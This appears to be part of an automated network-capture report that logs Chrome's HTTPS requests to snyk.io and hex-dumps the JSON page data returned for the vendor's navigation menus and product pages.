                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 34 37 44 4b 66 4f 6a 53 71 58 34 54 4c 6f 70 61 75 42 48 75 47 36 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 32 2d 31 32 54 31 32 3a 34 33 3a 34 37 2e 34 36 31 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 31 30 2d 30 32 54 31 35 3a 35 37 3a 35 34 2e 37 31 31 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 34 37 2c 22 72 65 76 69 73 69 6f 6e 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: "id":"oyrbri43adzz"}},"id":"47DKfOjSqX4TLopauBHuG6","type":"Entry","createdAt":"2023-12-12T12:43:47.461Z","updatedAt":"2024-10-02T15:57:54.711Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":47,"revision":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC983INData Raw: 69 74 79 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 74 69 67 61 74 65 20 73 75 70 70 6c 79 20 63 68 61 69 6e 20 72 69 73 6b 22 2c 22 75 72 6c 22 3a 22 2f 73 6f 6c 75 74 69 6f 6e 73 2f 73 6f 66 74 77 61 72 65 2d 73 75 70 70 6c 79 2d 63 68 61 69 6e 2d 73 65 63 75 72 69 74 79 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 75 70 70 6c 79 2d 63 68 61 69 6e 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 35 34 6b 74 6c 45 72 75 4c 46 59 6f 6f 6a 47 72 6a 52 59 74 69 4b 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 65
                                                                                                                                                                                                                                                                                                              Data Ascii: ity","description":"Mitigate supply chain risk","url":"/solutions/software-supply-chain-security/","appearance":{"navItem":{"icon":"supply-chain"}}},{"sys":{"id":"54ktlEruLFYoojGrjRYtiK","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Se
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 78 58 44 72 4a 51 4e 66 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 77 5a 64 63 52 6e 69 66 58 73 38 41 42 36 64 7a 44 4c 50 6b 42 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000xXDrJQNf","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"1wZdcRnifXs8AB6dzDLPkB","__typename":"Sys"},"__typename":"NavigationDropdownMenuCo
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC12INData Raw: 62 65 6c 22 3a 22 67 69 74 68 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: bel":"gith
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC5548INData Raw: 30 30 30 30 31 35 41 30 0d 0a 75 62 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 6e 79 6b 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 77 69 43 32 61 61 54 37 4f 71 71 76 75 35 77 68 64 71 70 62 4b 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 6e 70 6d 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 70 6d 6a 73 2e 63 6f 6d 2f 70 61 63 6b 61 67 65 2f 73 6e 79 6b 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 6f 6c 6a 66 54 4d 47 44 70 48 4a 4c 73 70 65 4d 4f 55 39 48 74 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79
                                                                                                                                                                                                                                                                                                              Data Ascii: 000015A0ub","url":"https://github.com/snyk/"},{"sys":{"id":"1wiC2aaT7Oqqvu5whdqpbK","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"npm","url":"https://www.npmjs.com/package/snyk"},{"sys":{"id":"3oljfTMGDpHJLspeMOU9Ht","__typename":"Sy
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              56192.168.2.54978323.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC616OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product.json?slug=product HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"hk68cv0rtt1k2a"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::zbkck-1729799346248-8a98161d8274
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:06 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799346.1f60b43
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC15763INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 37 75 69 62 44 46 59 54 79 30 45 6d 34 74 4a 68 33 45 52 43 4d 49 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 32 2d 31 32 54 32 32 3a 33 31 3a 32 39 2e 35 34 35 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 32 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7uibDFYTy0Em4tJh3ERCMI","type":"Entry","createdAt":"2022-12-12T22:31:29.545Z","updatedAt":"2023-09-22T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16002INData Raw: 6e 63 65 22 3a 7b 22 74 65 78 74 4d 65 64 69 61 22 3a 7b 7d 7d 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 32 50 4f 7a 48 6e 53 4c 47 54 52 65 75 34 62 41 69 34 69 65 31 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 32 2d 31 32 54 32 32 3a 33 31 3a 33 30 2e 31 39 32 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 30 54 32 32 3a 30 34 3a 33
                                                                                                                                                                                                                                                                                                              Data Ascii: nce":{"textMedia":{}}}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"62POzHnSLGTReu4bAi4ie1","type":"Entry","createdAt":"2022-12-12T22:31:30.192Z","updatedAt":"2023-09-20T22:04:3
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 4e 6a 4b 5a 74 70 30 63 6f 73 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 32 2d 31 32 54 32 32 3a 33 31 3a 33 30 2e 32 37 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 31 32 54 30 39 3a 30 33 3a 34 31 2e 30 39 38 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 35 31 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 37 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22
                                                                                                                                                                                                                                                                                                              Data Ascii: NjKZtp0cos","type":"Entry","createdAt":"2022-12-12T22:31:30.277Z","updatedAt":"2023-09-12T09:03:41.098Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":51,"revision":17,"contentType":{"sys":{"type":"Link","
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC1015INData Raw: 20 41 70 70 52 69 73 6b 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 52 65 64 75 63 65 20 72 69 73 6b 20 61 63 72 6f 73 73 20 79 6f 75 72 20 62 75 73 69 6e 65 73 73 22 2c 22 75 72 6c 22 3a 22 2f 70 72 6f 64 75 63 74 2f 73 6e 79 6b 2d 61 70 70 72 69 73 6b 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 6e 79 6b 2d 61 70 70 72 69 73 6b 22 7d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 32 76 42 33 4a 4c 39 64 58 44 71 58 4a 54 68 38 75 4a 46 4e 32 68 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22
                                                                                                                                                                                                                                                                                                              Data Ascii: AppRisk","description":"Reduce risk across your business","url":"/product/snyk-apprisk/","appearance":{"navItem":{"icon":"snyk-apprisk"}}}]}},{"sys":{"id":"2vB3JL9dXDqXJTh8uJFN2h","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 36 67 68 34 72 5a 72 35 64 56 44 51 32 78 50 66 77 7a 33 49 58 38 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 57 68 79 20 53 6e 79 6b 3f 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 6f 64 65 72 6e 20 73 65 63 75 72 69 74 79 20 69 6e 20 61 20 73 69 6e 67 6c 65 20 70 6c 61 74 66 6f 72 6d 22 2c 22 75 72 6c 22 3a 22 2f 70 6c 61 74 66 6f 72 6d 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 63 68 65 63 6b 62 6f 78 2d 68
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000tion","items":[{"sys":{"id":"6gh4rZr5dVDQ2xPfwz3IX8","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Why Snyk?","description":"Modern security in a single platform","url":"/platform/","appearance":{"navItem":{"icon":"checkbox-h
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC12INData Raw: 65 6e 61 6d 65 22 3a 22 4e 61 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ename":"Na
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC7166INData Raw: 30 30 30 30 31 42 46 32 0d 0a 76 69 67 61 74 69 6f 6e 46 6f 6f 74 65 72 41 63 74 69 6f 6e 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 7d 2c 22 73 70 6f 6e 73 6f 72 65 64 4c 6f 67 6f 22 3a 5b 5d 2c 22 73 70 6f 6e 73 6f 72 65 64 55 72 6c 22 3a 6e 75 6c 6c 2c 22 66 6f 6f 74 65 72 43 74 61 48 65 61 64 65 72 22 3a 22 54 68 65 20 64 65 76 65 6c 6f 70 65 72 20 73 65 63 75 72 69 74 79 20 70 6c 61 74 66 6f 72 6d 22 2c 22 66 6f 72 6d 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 46 6f 72 6d 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 6a 73 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00001BF2vigationFooterActionsCollection"},"sponsoredLogo":[],"sponsoredUrl":null,"footerCtaHeader":"The developer security platform","form":{"__typename":"ContentForm","description":{"json":{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              57192.168.2.54978023.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC641OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-code.json?slug=product&slug=snyk-code HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"v8nwodklwi3usz"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-code.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::db5zn-1729799346267-e6856a8079b0
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:06 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799346.1f60b4b
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC15753INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 66 43 6a 63 63 4d 73 30 72 74 48 79 78 38 58 58 6f 34 65 49 72 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 30 54 31 35 3a 35 37 3a 31 34 2e 30 30 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 39 2d 30 36 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6fCjccMs0rtHyx8XXo4eIr","type":"Entry","createdAt":"2022-10-20T15:57:14.006Z","updatedAt":"2024-09-06T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC15977INData Raw: 6f 76 65 72 76 69 65 77 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 62 6f 6c 64 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 6c 61 6e 67 75 61 67 65 73 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 79 70 65 72 6c 69 6e 6b 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 62 6f 6c 64 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 2c c2 a0 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 2f 70 6c 61 74 66 6f 72 6d 2f 69 64 65 2d 70 6c 75 67 69 6e 73 2f 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: overview"},"content":[{"data":{},"marks":[{"type":"bold"}],"value":"languages","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[{"type":"bold"}],"value":",","nodeType":"text"},{"data":{"uri":"/platform/ide-plugins/"},"content":[{"data":{}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 2d 30 37 2d 31 35 54 31 35 3a 34 39 3a 30 37 2e 33 32 33 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 35 35 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 33 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 51 75 6f 74 65 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: -07-15T15:49:07.323Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":55,"revision":13,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentQuote"}},"locale":"en-US"},"fields":{"internal
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC1050INData Raw: 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 73 50 32 55 56 4b 56 6a 66 4b 62 44 32 52 39 63 44 49 37 48 54 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 34 2d 32 35 54 31 36 3a 34 33 3a 35 31 2e 33 32 31 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 34 2d 32 35 54 31 36 3a 34 33 3a 35 31 2e 33 32 31 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 36 2c 22 72 65 76 69 73 69 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: ce","id":"oyrbri43adzz"}},"id":"6sP2UVKVjfKbD2R9cDI7HT","type":"Entry","createdAt":"2023-04-25T16:43:51.321Z","updatedAt":"2023-04-25T16:43:51.321Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":6,"revisio
